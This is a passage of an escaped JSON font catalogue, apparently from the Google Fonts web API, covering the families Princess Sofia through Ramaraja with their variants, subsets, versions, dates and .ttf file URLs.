\"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Princess Sofia\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/princesssofia/v21/qWczB6yguIb8DZ_GXZst16n7GRz7mDUoupoI.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Prociono\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/prociono/v22/r05YGLlR-KxAf9GGO8upyDYtStiJ.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Prompt\",\n      \"variants\": [\n        \"100\",\n        \"100italic\",\n        \"200\",\n        \"200italic\",\n        \"300\",\n        \"300italic\",\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\",\n        \"900\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"thai\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v10\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/prompt/v10/-W_9XJnvUD7dzB2CA9oYREcjeo0k.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/prompt/v10/-W_7XJnvUD7dzB2KZeJ8TkMBf50kbiM.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/prompt/v10/-W_8XJnvUD7dzB2Cr_s4bmkvc5Q9dw.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/prompt/v10/-W_6XJnvUD7dzB2KZeLQb2MrUZEtdzow.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/prompt/v10/-W_8XJnvUD7dzB2Cy_g4bmkvc5Q9dw.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/prompt/v10/-W_6XJnvUD7dzB2KZeK0bGMrUZEtdzow.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/prompt/v10/-W__XJnvUD7dzB26Z9AcZkIzeg.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/prompt/v10/-W_9XJnvUD7dzB2KZdoYREcjeo0k.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/prompt/v10/-W_8XJnvUD7dzB2Ck_k4bmkvc5Q9dw.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/prompt/v10/-W_6XJnvUD7dzB2KZeLsbWMrUZEtdzow.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/prompt/v10/-W_8XJnvUD7dzB2Cv_44bmkvc5Q9dw.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/prompt/v10/-W_6XJnvUD7dzB2KZeLAamMrUZEtdzow.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/prompt/v10/-W_8XJnvUD7dzB2C2_84bmkvc5Q9dw.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/prompt/v10/-W_6XJnvUD7dzB2KZeKka2MrUZEtdzow.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/prompt/v10/-W_8XJnvUD7dzB2Cx_w4bmkvc5Q9dw.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/prompt/v10/-W_6XJnvUD7dzB2KZeK4aGMrUZEtdzow.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/prompt/v10/-W_8XJnvUD7dzB2C4_04bmkvc5Q9dw.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/prompt/v10/-W_6XJnvUD7dzB2KZeKcaWMrUZEtdzow.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Prosto One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/prostoone/v17/OpNJno4VhNfK-RgpwWWxpipfWhXD00c.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Proza Libre\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"500\",\n        \"500italic\",\n        \"600\",\n        \"600italic\",\n        \"700\",\n        \"700italic\",\n        \"800\",\n        \"800italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/prozalibre/v9/LYjGdGHgj0k1DIQRyUEyyHovftvXWYyz.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/prozalibre/v9/LYjEdGHgj0k1DIQRyUEyyEotdN_1XJyz7zc.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/prozalibre/v9/LYjbdGHgj0k1DIQRyUEyyELbV__fcpC69i6N.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/prozalibre/v9/LYjZdGHgj0k1DIQRyUEyyEotTCvceJSY8z6Np1k.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/prozalibre/v9/LYjbdGHgj0k1DIQRyUEyyEL3UP_fcpC69i6N.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/prozalibre/v9/LYjZdGHgj0k1DIQRyUEyyEotTAfbeJSY8z6Np1k.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/prozalibre/v9/LYjbdGHgj0k1DIQRyUEyyEKTUf_fcpC69i6N.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/prozalibre/v9/LYjZdGHgj0k1DIQRyUEyyEotTGPaeJSY8z6Np1k.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/prozalibre/v9/LYjbdGHgj0k1DIQRyUEyyEKPUv_fcpC69i6N.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/prozalibre/v9/LYjZdGHgj0k1DIQRyUEyyEotTH_ZeJSY8z6Np1k.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Public Sans\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/publicsans/v14/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymuFpi5ww0pX189fg.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/publicsans/v14/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymulpm5ww0pX189fg.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/publicsans/v14/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymuSJm5ww0pX189fg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/publicsans/v14/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymuFpm5ww0pX189fg.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/publicsans/v14/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymuJJm5ww0pX189fg.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/publicsans/v14/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymuyJ65ww0pX189fg.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/publicsans/v14/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymu8Z65ww0pX189fg.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/publicsans/v14/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymulp65ww0pX189fg.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/publicsans/v14/ijwGs572Xtc6ZYQws9YVwllKVG8qX1oyOymuv565ww0pX189fg.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/publicsans/v14/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673tpRgQctfVotfj7j.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/publicsans/v14/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673trRgActfVotfj7j.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/publicsans/v14/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673toPgActfVotfj7j.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/publicsans/v14/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673tpRgActfVotfj7j.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/publicsans/v14/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673tpjgActfVotfj7j.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/publicsans/v14/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673tqPhwctfVotfj7j.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/publicsans/v14/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673tq2hwctfVotfj7j.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/publicsans/v14/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673trRhwctfVotfj7j.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/publicsans/v14/ijwAs572Xtc6ZYQws9YVwnNDZpDyNjGolS673tr4hwctfVotfj7j.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Puppies Play\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/puppiesplay/v5/wlp2gwHZEV99rG6M3NR9uB9vaAJSA_JN3Q.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Puritan\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/puritan/v24/845YNMgkAJ2VTtIo9JrwRdaI50M.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/puritan/v24/845aNMgkAJ2VTtIoxJj6QfSN90PfXA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/puritan/v24/845dNMgkAJ2VTtIozCbfYd6j-0rGRes.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/puritan/v24/845fNMgkAJ2VTtIoxJjC_dup_2jDVevnLQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Purple Purse\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/purplepurse/v21/qWctB66gv53iAp-Vfs4My6qyeBb_ujA4ug.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Qahiri\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/qahiri/v9/tsssAp1RZy0C_hGuU3Chrnmupw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Quando\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/quando/v14/xMQVuFNaVa6YuW0pC6WzKX_QmA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Quantico\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/quantico/v15/rax-HiSdp9cPL3KIF4xsLjxSmlLZ.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/quantico/v15/rax4HiSdp9cPL3KIF7xuJDhwn0LZ6T8.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/quantico/v15/rax5HiSdp9cPL3KIF7TQARhasU7Q8Cad.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/quantico/v15/rax7HiSdp9cPL3KIF7xuHIRfu0ry9TadML4.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Quattrocento\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/quattrocento/v17/OZpEg_xvsDZQL_LKIF7q4jPHxGL7f4jFuA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/quattrocento/v17/OZpbg_xvsDZQL_LKIF7q4jP_eE3fd6PZsXcM9w.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Quattrocento Sans\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/quattrocentosans/v18/va9c4lja2NVIDdIAAoMR5MfuElaRB3zOvU7eHGHJ.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/quattrocentosans/v18/va9a4lja2NVIDdIAAoMR5MfuElaRB0zMt0r8GXHJkLI.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/quattrocentosans/v18/va9Z4lja2NVIDdIAAoMR5MfuElaRB0RykmrWN33AiasJ.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/quattrocentosans/v18/va9X4lja2NVIDdIAAoMR5MfuElaRB0zMj_bTPXnijLsJV7E.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Questrial\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/questrial/v18/QdVUSTchPBm7nuUeVf7EuStkm20oJA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Quicksand\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v30\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/quicksand/v30/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkKEo18G0wx40QDw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/quicksand/v30/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkP8o18G0wx40QDw.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/quicksand/v30/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkM0o18G0wx40QDw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/quicksand/v30/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkCEv18G0wx40QDw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/quicksand/v30/6xK-dSZaM9iE8KbpRA_LJ3z8mH9BOJvgkBgv18G0wx40QDw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Quintessential\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/quintessential/v20/fdNn9sOGq31Yjnh3qWU14DdtjY5wS7kmAyxM.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Qwigley\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/qwigley/v16/1cXzaU3UGJb5tGoCuVxsi1mBmcE.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Qwitcher Grypen\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v3\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/qwitchergrypen/v3/pxicypclp9tDilN9RrC5BSI1dZmrSGNAom-wpw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/qwitchergrypen/v3/pxiZypclp9tDilN9RrC5BSI1dZmT9ExkqkSsrvNXiA.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Racing Sans One\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/racingsansone/v13/sykr-yRtm7EvTrXNxkv5jfKKyDCwL3rmWpIBtA.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Radio Canada\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/radiocanada/v16/XRX13ISXn0dBMcibU6jlAqr3ejLv5OLZYiYXik6db2P4jxxlsls-0nESkQPIJOdSSfOT.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/radiocanada/v16/XRX13ISXn0dBMcibU6jlAqr3ejLv5OLZYiYXik6db2P4jxxlsls-0nFMkQPIJOdSSfOT.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/radiocanada/v16/XRX13ISXn0dBMcibU6jlAqr3ejLv5OLZYiYXik6db2P4jxxlsls-0nF-kQPIJOdSSfOT.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/radiocanada/v16/XRX13ISXn0dBMcibU6jlAqr3ejLv5OLZYiYXik6db2P4jxxlsls-0nGSlgPIJOdSSfOT.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/radiocanada/v16/XRX13ISXn0dBMcibU6jlAqr3ejLv5OLZYiYXik6db2P4jxxlsls-0nGrlgPIJOdSSfOT.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/radiocanada/v16/XRX33ISXn0dBMcibU6jlAqrdcwAMBJuK9IgQn4bfnSrKcMQM2cGQ1WSE0rWLLuNwTOOTa9k.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/radiocanada/v16/XRX33ISXn0dBMcibU6jlAqrdcwAMBJuK9IgQn4bfnSrKcMQM2cGQ1WSE0uuLLuNwTOOTa9k.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/radiocanada/v16/XRX33ISXn0dBMcibU6jlAqrdcwAMBJuK9IgQn4bfnSrKcMQM2cGQ1WSE0tmLLuNwTOOTa9k.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/radiocanada/v16/XRX33ISXn0dBMcibU6jlAqrdcwAMBJuK9IgQn4bfnSrKcMQM2cGQ1WSE0jWMLuNwTOOTa9k.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/radiocanada/v16/XRX33ISXn0dBMcibU6jlAqrdcwAMBJuK9IgQn4bfnSrKcMQM2cGQ1WSE0gyMLuNwTOOTa9k.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Radley\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/radley/v20/LYjDdGzinEIjCN19oAlEpVs3VQ.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/radley/v20/LYjBdGzinEIjCN1NogNAh14nVcfe.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rajdhani\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/rajdhani/v15/LDI2apCSOBg7S-QT7pasEcOsc-bGkqIw.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/rajdhani/v15/LDIxapCSOBg7S-QT7q4AOeekWPrP.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/rajdhani/v15/LDI2apCSOBg7S-QT7pb0EMOsc-bGkqIw.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/rajdhani/v15/LDI2apCSOBg7S-QT7pbYF8Osc-bGkqIw.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/rajdhani/v15/LDI2apCSOBg7S-QT7pa8FsOsc-bGkqIw.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Rakkas\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/rakkas/v17/Qw3cZQlNHiblL3j_lttPOeMcCw.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Raleway\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v28\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/raleway/v28/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvao4CPNLA3JC9c.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/raleway/v28/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVtaooCPNLA3JC9c.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/raleway/v28/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVuEooCPNLA3JC9c.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/raleway/v28/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvaooCPNLA3JC9c.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/raleway/v28/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVvoooCPNLA3JC9c.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/raleway/v28/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVsEpYCPNLA3JC9c.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/raleway/v28/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVs9pYCPNLA3JC9c.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/raleway/v28/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVtapYCPNLA3JC9c.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/raleway/v28/1Ptxg8zYS_SKggPN4iEgvnHyvveLxVtzpYCPNLA3JC9c.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4WjNPrQVIT9c2c8.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4ejMPrQVIT9c2c8.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4TbMPrQVIT9c2c8.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4WjMPrQVIT9c2c8.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4VrMPrQVIT9c2c8.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4bbLPrQVIT9c2c8.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4Y_LPrQVIT9c2c8.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4ejLPrQVIT9c2c8.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/raleway/v28/1Pt_g8zYS_SKggPNyCgSQamb1W0lwk4S4cHLPrQVIT9c2c8.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Raleway Dots\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ralewaydots/v14/6NUR8FifJg6AfQvzpshgwJ8kyf9Fdty2ew.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ramabhadra\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"telugu\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-04-27\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ramabhadra/v15/EYq2maBOwqRW9P1SQ83LehNGX5uWw3o.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Ramaraja\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"telugu\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/ramaraja/v15/SlGTmQearpYAYG1CABIkqnB6aSQU.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    